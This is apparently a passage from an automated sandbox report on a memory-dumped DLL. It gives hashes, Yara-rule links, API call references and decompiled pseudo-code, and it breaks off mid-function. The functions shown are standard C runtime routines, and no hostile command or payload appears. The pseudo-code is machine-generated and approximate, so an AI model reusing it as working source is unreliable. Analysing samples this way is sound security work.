Opcode Fuzzy Hash: 7d03b0296f953523a1334306b755775dd023289901e398cd6ac30403506fa05d
Instruction Fuzzy Hash: DAF0F031A4528CBBDF01AF65CC04F7E7FB0EF88341F014008F9096A251CB329D109AD4

Uniqueness

Uniqueness Score: -1.00%

Function 6D4B5150, Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 279d36cb624a28dc2fc8018b7e3dec838c29ea01aa9c7dd68c94839918219c16
Instruction ID: 2c2d320c31560d718e3e2dd127c163b98e03fb64f4c741d4e0fd2fbf9524095f
Opcode Fuzzy Hash: 279d36cb624a28dc2fc8018b7e3dec838c29ea01aa9c7dd68c94839918219c16
Instruction Fuzzy Hash: DE023B71E0521A9BDB14CFA9C890AAEF7F1FF98314F25826AD919E7344D730AD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D0396, Relevance: 1.8, APIs: 1, Instructions: 269COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6D4D0391,?,?,00000008,?,?,6D4E3E64,00000000), ref: 6D4D05C3

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: c6c583d9310cebfeb72117e141ff6b73ed6ae745282c53e49db2c398f9d21fd6
Instruction ID: 6d9e3b6b6c349ae4ea76d5845683cd026fd0c70767122be30ae4dcb180d94b63
Opcode Fuzzy Hash: c6c583d9310cebfeb72117e141ff6b73ed6ae745282c53e49db2c398f9d21fd6
Instruction Fuzzy Hash: ECB147312206099FD745CF29C4A6F697BE0FF45364F258698E8A9CF2A1C335ED92CB40

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DE3EF, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 6D4CD5FF: GetLastError.KERNEL32(?,6D55CE94,6D4C1803,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD603
Part of subcall function 6D4CD5FF: _free.LIBCMT ref: 6D4CD636
Part of subcall function 6D4CD5FF: SetLastError.KERNEL32(00000000,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD677
Part of subcall function 6D4CD5FF: _abort.LIBCMT ref: 6D4CD67D

Part of subcall function 6D4CD5FF: _free.LIBCMT ref: 6D4CD65E
Part of subcall function 6D4CD5FF: SetLastError.KERNEL32(00000000,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD66B

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D4DE443

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 823e5663715b79883a8aedea2d4e99a3a4cfe8770efa732f54e4ed532c48fc50
Instruction ID: 35c9a2ecb1de60d69a8ac69bbc017b0aa69c588e9fbadfcf53c842a1986de29c
Opcode Fuzzy Hash: 823e5663715b79883a8aedea2d4e99a3a4cfe8770efa732f54e4ed532c48fc50
Instruction Fuzzy Hash: 7521D332514107ABDB54DE24CC91F7AB3B8EF41328F11407EEE00EA240EB759D44DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DE61F, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 6D4CD5FF: GetLastError.KERNEL32(?,6D55CE94,6D4C1803,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD603
Part of subcall function 6D4CD5FF: _free.LIBCMT ref: 6D4CD636
Part of subcall function 6D4CD5FF: SetLastError.KERNEL32(00000000,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD677
Part of subcall function 6D4CD5FF: _abort.LIBCMT ref: 6D4CD67D

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,6D4DE49A,00000000,00000000,?), ref: 6D4DE64B

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 6c5c66f3b4d2639f73f97640a2dee6fa15ab049ec223ab7673aae9bdeaa08f56
Instruction ID: a4b573135cf85793d4d973ea84f656fc10f0c448542811406f53f3fc9c516bbc
Opcode Fuzzy Hash: 6c5c66f3b4d2639f73f97640a2dee6fa15ab049ec223ab7673aae9bdeaa08f56
Instruction Fuzzy Hash: 87F04932A00116ABDB549A648899FBBB768EB40318F56443CED59E3280EB70FD0286D0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D3952, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 6D4C2361: EnterCriticalSection.KERNEL32(-000BFC7F,?,6D4C92B1,00000000,6D542CE8,0000000C,6D4C926C,?,?,?,6D4CC822,?,?,6D4CD6B4,00000001,00000364), ref: 6D4C2370

EnumSystemLocalesW.KERNEL32(6D4D390C,00000001,6D543078,0000000C), ref: 6D4D398A

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 53dcbdb82dd0c1f2251bbbdb4670bea3d92caf36357826b091ec84bd873df3ed
Instruction ID: 3926ba60aad37caf536bf18e18fca5054b0d1f1fb55744776af7540e2d6447c9
Opcode Fuzzy Hash: 53dcbdb82dd0c1f2251bbbdb4670bea3d92caf36357826b091ec84bd873df3ed
Instruction Fuzzy Hash: 36F04936A10200EFEF10EF68C449F6D7BB0BB05325F12815AE514DB295CB748E849F82

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DE00E, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 6D4CD5FF: GetLastError.KERNEL32(?,6D55CE94,6D4C1803,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD603
Part of subcall function 6D4CD5FF: _free.LIBCMT ref: 6D4CD636
Part of subcall function 6D4CD5FF: SetLastError.KERNEL32(00000000,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,D7A19FD1), ref: 6D4CD677
Part of subcall function 6D4CD5FF: _abort.LIBCMT ref: 6D4CD67D

EnumSystemLocalesW.KERNEL32(6D4DDF65,00000001,00000006,?,?,6D4DE7EE,;Lm,?,?,?,?,?,6D4CE03B,?,?,?), ref: 6D4DE045

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 44b08b29500c3258f67f922a21d1bf0a66e3c06999df839739e217d78f6b5fa0
Instruction ID: 90e478219dbd2a52e6ae23f0a808f274191b84a00c0e6e32d4f8cb1bb9d46395
Opcode Fuzzy Hash: 44b08b29500c3258f67f922a21d1bf0a66e3c06999df839739e217d78f6b5fa0
Instruction Fuzzy Hash: 85F0A03A20024657CB09AF39C855A6ABBA4EFC2714B164068EA09CB641CB76DC42C790

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BE079, Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 6D4BE1E9

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: c3b3a44a33e3dfe07a1a69b5db6e0a9dd8f9e9e3da1b76fad72fd456ee2bed9f
Instruction ID: 7f1e81a65a43ff0bc1fd5f6a792ce6e91764affc08d31b9cb7319a9dc45c896a
Opcode Fuzzy Hash: c3b3a44a33e3dfe07a1a69b5db6e0a9dd8f9e9e3da1b76fad72fd456ee2bed9f
Instruction Fuzzy Hash: EB51667020964796DB25896889D0FBE3795ABF2304F3099F9D9D1C7381C635DD0383B2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C84BB, Relevance: .7, Instructions: 669COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8523af5c97278a256f956927936cddcbb9548291b82c93668b5720af8e6ace69
Instruction ID: 7bc3da587bd8e0537ce92e92880245513bdbb8ac295ecc24b6f48f00df3bd632
Opcode Fuzzy Hash: 8523af5c97278a256f956927936cddcbb9548291b82c93668b5720af8e6ace69
Instruction Fuzzy Hash: F2327E78A0020ADFDB18CF58C991EBEBBB5FF85304F244168D94197315E732AE56CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D67D9, Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9808e303d5161797f7d63dba2bb7aae148f4f4151875ce6c9003dc35e0ecce12
Instruction ID: 1e18bfa42f9af9d8fa1827893c39004917b90bda0b65631a3eb2dc35064f7d79
Opcode Fuzzy Hash: 9808e303d5161797f7d63dba2bb7aae148f4f4151875ce6c9003dc35e0ecce12
Instruction Fuzzy Hash: 9F323661D29F454DDB63A634C831339B258AFF73C4F11D727F81AB5AA9EB29C8934140

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A3E00, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 5e452cc5b3c6b93a16622029c28861711dc35bf2f3bc2041636329d3e85a7441
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 5F11E27724018383D30189ADD8BCFB7F395EBEA225B3C426AD0618B75CF223AD459600

Uniqueness

Uniqueness Score: -1.00%

Function 6D4616BC, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bed8f5b6e8a28e6157955566579604086527ae03734673a5438ce10fcfe377f9
Instruction ID: 63d17f097a4cc6365853cc7545491897d38ef4d70dda1f1de999012799365b95
Opcode Fuzzy Hash: bed8f5b6e8a28e6157955566579604086527ae03734673a5438ce10fcfe377f9
Instruction Fuzzy Hash: 5DF01C35704585AFDB04CF15C540F26B7A9FB09A50F144269E926CBB91DB35E8048A50

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DBF64, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D4DBF64(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6d5450b8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6D4CCBD3(_t46);
							E6D4DC7CF( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6D4CCBD3(_t47);
							E6D4DCCC3( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6D4CCBD3( *((intOrPtr*)(_t74 + 0x7c)));
						E6D4CCBD3( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6D4CCBD3( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6D4CCBD3( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6D4CCBD3( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6D4CCBD3( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6D4DC0D7( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0xa0
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x28
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6d5452b0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6D4CCBD3(_t31);
							E6D4CCBD3( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6D4CCBD3(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6D4CCBD3(_t74);
			}

0x6d4dbf6c
0x6d4dbf70
0x6d4dbf78
0x6d4dbf81
0x6d4dbf86
0x6d4dbf8d
0x6d4dbf95
0x6d4dbf9d
0x6d4dbfa8
0x6d4dbfae
0x6d4dbfaf
0x6d4dbfb7
0x6d4dbfbf
0x6d4dbfca
0x6d4dbfd0
0x6d4dbfd4
0x6d4dbfdf
0x6d4dbfe5
0x6d4dbf86
0x6d4dbfe6
0x6d4dbfee
0x6d4dc001
0x6d4dc014
0x6d4dc022
0x6d4dc02d
0x6d4dc032
0x6d4dc03b
0x6d4dc043
0x6d4dc044
0x6d4dc044
0x6d4dc04a
0x6d4dc04d
0x6d4dc04d
0x6d4dc050
0x6d4dc057
0x6d4dc059
0x6d4dc05d
0x6d4dc065
0x6d4dc06c
0x6d4dc072
0x6d4dc073
0x6d4dc073
0x6d4dc07a
0x6d4dc07c
0x6d4dc081
0x6d4dc089
0x6d4dc08e
0x6d4dc08f
0x6d4dc08f
0x6d4dc092
0x6d4dc095
0x6d4dc098
0x6d4dc09b
0x6d4dc09b
0x6d4dc0ad

APIs

___free_lconv_mon.LIBCMT ref: 6D4DBFA8

Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC7EC
Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC7FE
Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC810
Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC822
Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC834
Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC846
Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC858
Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC86A
Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC87C
Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC88E
Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC8A0
Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC8B2
Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC8C4

_free.LIBCMT ref: 6D4DBF9D

Part of subcall function 6D4CCBD3: HeapFree.KERNEL32(00000000,00000000,?,6D4DCFAF,00000000,00000000,00000000,00000000,?,6D4DD2B4,00000000,00000007,00000000,?,6D4DC0FC,00000000), ref: 6D4CCBE9
Part of subcall function 6D4CCBD3: GetLastError.KERNEL32(00000000,?,6D4DCFAF,00000000,00000000,00000000,00000000,?,6D4DD2B4,00000000,00000007,00000000,?,6D4DC0FC,00000000,00000000), ref: 6D4CCBFB

_free.LIBCMT ref: 6D4DBFBF
_free.LIBCMT ref: 6D4DBFD4
_free.LIBCMT ref: 6D4DBFDF
_free.LIBCMT ref: 6D4DC001
_free.LIBCMT ref: 6D4DC014
_free.LIBCMT ref: 6D4DC022
_free.LIBCMT ref: 6D4DC02D
_free.LIBCMT ref: 6D4DC065
_free.LIBCMT ref: 6D4DC06C
_free.LIBCMT ref: 6D4DC089
_free.LIBCMT ref: 6D4DC0A1

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: e47e6515e86acb3e28363ad1a88701adc73fef58333804502ab4521a721a2791
Instruction ID: e1d1b62074adb9544364dc114549019808776951e1401d154c963c8f8dbf825e
Opcode Fuzzy Hash: e47e6515e86acb3e28363ad1a88701adc73fef58333804502ab4521a721a2791
Instruction Fuzzy Hash: 47315C316083069FEB619BB8E854F6A73FAEF04314F21481EE168D7695EF31AD50CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D877C, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370
timeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E6D4D877C(void* __ebx, void* __edi, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				void* _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __esi;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				intOrPtr _t167;
				signed int _t168;
				intOrPtr* _t169;
				void* _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t171 = __edi;
				_t65 = E6D4D822B();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E6D4D8289( &_v8) != 0 || E6D4D8231( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6D4C2188();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E6D4D822B();
					_t32 =  &_v52; // 0x6d4f2130
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E6D4D8289(_t32);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E6D4C2188();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x6d54506c; // 0x9d44929c
						_v100 = _t74 ^ _t192;
						 *0x6d545384 =  *0x6d545384 | 0xffffffff;
						 *0x6d545378 =  *0x6d545378 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t172 = 0;
						 *0x6d547a10 = 0;
						_t78 = E6D4D1216(0x6d4f2130, _t167, 0, __eflags,  &_v360,  &_v356, 0x100, 0x6d4f2130);
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E6D4CF26D(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E6D4D1216(0x6d4f2130, _t167, 0, __eflags,  &_v280, _t184, _v276, 0x6d4f2130);
									__eflags = _t85;
									if(_t85 == 0) {
										E6D4CCBD3(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L73;
									}
								} else {
									_push(0);
									L73:
									E6D4CCBD3();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L81:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L81;
							} else {
								_push(_t172);
								E6D4D877C(0x6d4f2130, _t172, __eflags);
							}
						}
						E6D4CCBD3(_t183);
						__eflags = _v16 ^ _t192;
						return E6D49F8A5(_v16 ^ _t192, _t167, _t183);
					} else {
						_t89 = E6D4D8231( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E6D4D825D( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E6D4CCBD3( *0x6d547a08);
								 *0x6d547a08 = 0;
								 *_t194 = 0x6d547a18;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x6d547a18 * 0x3c;
									_t168 =  *0x6d547a6c; // 0x0
									_push(_t171);
									 *0x6d547a10 = 1;
									_v12 = _t150;
									__eflags =  *0x6d547a5e; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t168 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x6d547ab2; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x6d547ac0; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t168) * 0x3c;
										}
									}
									_t176 = E6D4C3CD0(0, _t168);
									_t99 = WideCharToMultiByte(_t176, 0, 0x6d547a1c, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x6d547a70, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E6D4D8225()) = _v12;
								 *((intOrPtr*)(E6D4D8219())) = _v16;
								_t96 = E6D4D821F();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t169 =  *0x6d547a08; // 0x0
					_t178 = _a4;
					if(_t169 == 0) {
						L12:
						E6D4CCBD3(_t169);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x6d4d8b6d
						_t170 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t170 + 1; // 0x6d4d8b6e
						 *0x6d547a08 = E6D4CF26D(_t154 - _t170, _t13);
						_t116 = E6D4CCBD3(0);
						_t167 =  *0x6d547a08; // 0x0
						if(_t167 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x6d4d8b6d
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x6d4d8b6e
							_t119 = E6D4CAB60(_t167, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
